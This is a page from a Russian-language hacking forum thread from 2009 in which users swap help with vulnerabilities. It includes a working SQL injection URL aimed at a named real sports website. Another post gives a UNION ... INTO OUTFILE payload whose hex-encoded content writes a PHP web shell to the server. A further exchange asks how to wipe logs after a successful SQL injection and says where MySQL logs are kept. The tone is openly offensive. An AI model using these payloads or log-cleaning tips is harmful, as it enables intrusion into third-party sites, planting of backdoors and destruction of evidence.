FORUMS

MEMBERS

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 953 из 2422

953

Опции темы

Поиск в этой теме

Опции просмотра

27.10.2009, 23:44

Rubaka

Участник форума

Регистрация: 02.09.2007

Сообщений: 292

Провел на форуме:
3659973

Репутация: 466

Отправить сообщение для Rubaka с помощью ICQ

jokester
да неправ я был ,ступил
везде где нет кавычек и права для чтения я в /tmp могу писать
сайтов 5-6 попробовал

28.10.2009, 00:18

crazy~driver

Познающий

Регистрация: 21.12.2008

Сообщений: 93

Провел на форуме:
391983

Репутация: 39

Отправить сообщение для crazy~driver с помощью ICQ

подскажите есть ли здесь скуль иньекция
www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546'

28.10.2009, 00:34

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

Код:

http://www.craigolsonsports.com/newsarticle.php?id=0809&nid=29546%20and%201=2%20union%20select%20user(),2+--+

__________________
Карфаген должен быть разрушен...

28.10.2009, 04:59

ILYAtirtir

Участник форума

Регистрация: 25.04.2007

Сообщений: 176

Провел на форуме:
1957988

Репутация: 739

Отправить сообщение для ILYAtirtir с помощью ICQ

Код:

http://site.com/calendar.php?event_id=681+union+select+null,0x3c3f 70687020696e636c75646528245f4745545b67675f696e635d 293b3f3e,null,null,null+into+outfile+0x2f706174682 f746f2f6d792f7363726970742e706870

ну может потому и не пишется что ты путь в hex'е вписал))

28.10.2009, 05:28

_gr34t

Участник форума

Регистрация: 26.10.2008

Сообщений: 106

Провел на форуме:
461696

Репутация: 40

Цитата:

Сообщение от ILYAtirtir

ну может потому и не пишется что ты путь в hex'е вписал))

Блиа.

ILYAtirtir, спасибо что разморочил. )

Отвечаю, что где-то на ачате видел такое. В памяти отложилось вот и писал так. Оказывается так нельзя )

Тогда другой вопрос: можно как-нибудь обойти кавычки?

28.10.2009, 07:22

Pashkela

Динозавр

Регистрация: 10.01.2008

Сообщений: 2,841

Провел на форуме:
9220514

Репутация: 3338

Отправить сообщение для Pashkela с помощью ICQ

нет, только если есть двойной запрос в скуле

28.10.2009, 11:33

SpYeR

Новичок

Регистрация: 11.11.2007

Сообщений: 17

Провел на форуме:
64705

Репутация: 6

Можно ли получить куки поддомена (test.site.ru) если есть xss в основном домене(site.ru)?

28.10.2009, 11:50

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

Цитата:

Сообщение от SpYeR

Можно ли получить куки поддомена (test.site.ru) если есть xss в основном домене(site.ru)?

Нельзя.

28.10.2009, 16:26

Op3r

Новичок

Регистрация: 10.12.2007

Сообщений: 11

Провел на форуме:
212520

Репутация: 1

как после удачной SQL inj. чистить логи?
версия MySQL 5.1.22-rc-log
где их искать?

#10

28.10.2009, 16:53

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Обычно:
/var/log/mysql

Страница 953 из 2422

953

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

ANTICHAT.XYZ